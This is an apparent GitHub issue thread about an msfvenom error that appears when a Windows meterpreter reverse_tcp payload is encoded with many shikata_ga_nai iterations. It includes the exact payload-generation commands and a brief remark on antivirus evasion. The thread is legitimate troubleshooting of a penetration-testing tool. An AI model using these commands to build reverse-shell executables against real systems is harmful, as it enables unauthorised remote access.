metasploit-framework
metasploit-framework copied to clipboard
rapid7
Msfvenom No section contains RVA
hello
I have a problem/ a question why whene i encode a payload i get this error No section contains RVA
I get this error whene I encode with a big iterations for exemple :
msfvenom -p windows/x64/meterpreter/reverse_tcp --format exe-only --encoder x86/shikata_ga_nai --iterations 1 --arch x64 --out BugExemple.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 537 (iteration=0)
x86/shikata_ga_nai chosen with final size 537
Payload size: 537 bytes
Final size of exe-only file: 6144 bytes
Saved as: BugExemple.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp --format exe-only --encoder x86/shikata_ga_nai --iterations 1000 --arch x64 --out BugExemple.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1000 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 537 (iteration=0)
x86/shikata_ga_nai succeeded with size 564 (iteration=1)
.........
x86/shikata_ga_nai succeeded with size 29414 (iteration=997)
x86/shikata_ga_nai succeeded with size 29443 (iteration=998)
x86/shikata_ga_nai succeeded with size 29472 (iteration=999)
x86/shikata_ga_nai chosen with final size 29472
Error: No section contains RVA
It does that with every payload
Pretty sure that one issue is that the payload is so large due to being encoded 1000 times that this line below causes addressOfEntryPoint to be negative.
https://github.com/rapid7/metasploit-framework/blob/2f1949d02101e17cbdf62dfc2ff1aeaccdc9fc62/lib/msf/util/exe.rb#L420
It doesn't look like the code currently supports resizing the .text section so any payload that won't fit in there can't be generated. You could specify your own executable template with a .text section that is of a sufficient size. The method should probably throw an exception if the payload won't fit in the .text section (ie. sizeOfRawData < code.length).
Having said that, even if you did that and we detected the error condition and reported it correctly, your payload wouldn't work because you're encoding an x64 payload with an x86 encoder.
As a side note, if you're hoping that encoding the payload 1000 times will help it evade anti-virus, it would be dependant on the AV but in general, it's unlikely.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.